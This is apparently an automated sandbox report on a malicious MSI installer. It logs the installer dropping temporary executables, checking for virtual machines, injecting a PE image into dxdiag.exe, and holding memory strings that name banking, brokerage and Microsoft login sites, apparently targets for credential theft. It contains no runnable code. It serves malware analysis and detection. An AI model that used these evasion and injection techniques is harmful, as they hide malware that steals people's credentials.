Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Installer\MSIAEB.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Installer\MSIAEB.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: msit.msi

Static file information: File size 16847872 > 1048576

Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: msit.msi, 5403ef.msi.2.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: msit.msi, MSI839.tmp.2.dr, 5403ef.msi.2.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: msit.msi, MSI839.tmp.2.dr, 5403ef.msi.2.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: msit.msi, MSI670.tmp.2.dr, 5403ef.msi.2.dr

Source: MSI602.tmp.2.dr	Static PE information: section name: .fptable
Source: MSI670.tmp.2.dr	Static PE information: section name: .fptable
Source: MSI6FE.tmp.2.dr	Static PE information: section name: .fptable
Source: MSI79B.tmp.2.dr	Static PE information: section name: .fptable
Source: MSI839.tmp.2.dr	Static PE information: section name: .fptable
Source: MSI982.tmp.2.dr	Static PE information: section name: .fptable
Source: MSIAEB.tmp.2.dr	Static PE information: section name: .fptable
Source: MSIAEB.tmp.2.dr	Static PE information: section name: _RDATA

Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_3_028F695D push cs; retf	6_3_028F6912
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_3_0291D348 push cs; retf	6_3_0291D2FD
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00442904 push es; ret	6_2_00442905
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00445921 push es; iretd	6_2_0044592C
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00438A00 push eax; mov dword ptr [esp], BEBFA0A1h	6_2_00438A0E
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00445A3C push ebx; ret	6_2_00445A3D
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_004423EC push es; ret	6_2_004423ED
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0043B690 push eax; mov dword ptr [esp], E3E2E1D0h	6_2_0043B692

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\msiexec.exe

Executable created and started: C:\Windows\Installer\MSIAEB.tmp

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIAEB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI602.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI670.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI982.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI6FE.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI79B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI839.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIAEB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI602.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI670.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI982.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI6FE.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI79B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI839.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\dxdiag.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI602.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI982.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI670.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI79B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI6FE.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI839.tmp	Jump to dropped file

Source: C:\Windows\SysWOW64\dxdiag.exe TID: 5708

Thread sleep time: -150000s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 5403ef.msi.2.dr	Binary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
Source: dxdiag.exe, dxdiag.exe, 00000006.00000002.2307824056.00000000028EC000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2303635403.00000000028EC000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000002.2307824056.0000000002916000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2303635403.0000000002916000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A85000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe

Code function: 6_2_00439E40 LdrInitializeThunk,

6_2_00439E40

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\Installer\MSIAEB.tmp "C:\Windows\Installer\MSIAEB.tmp"

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Windows\Installer\MSIAEB.tmp

Memory allocated: C:\Windows\SysWOW64\dxdiag.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\Installer\MSIAEB.tmp

Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\Installer\MSIAEB.tmp	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000	Jump to behavior
Source: C:\Windows\Installer\MSIAEB.tmp	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 401000	Jump to behavior
Source: C:\Windows\Installer\MSIAEB.tmp	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 43E000	Jump to behavior
Source: C:\Windows\Installer\MSIAEB.tmp	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 441000	Jump to behavior
Source: C:\Windows\Installer\MSIAEB.tmp	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 451000	Jump to behavior
Source: C:\Windows\Installer\MSIAEB.tmp	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 452000	Jump to behavior
Source: C:\Windows\Installer\MSIAEB.tmp	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 2BC008	Jump to behavior

Source: C:\Windows\Installer\MSIAEB.tmp	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"			Jump to behavior
Source: C:\Windows\Installer\MSIAEB.tmp	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"			Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Installer\MSIAEB.tmp

Code function: 4_2_00007FF78E2E5D6C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_00007FF78E2E5D6C

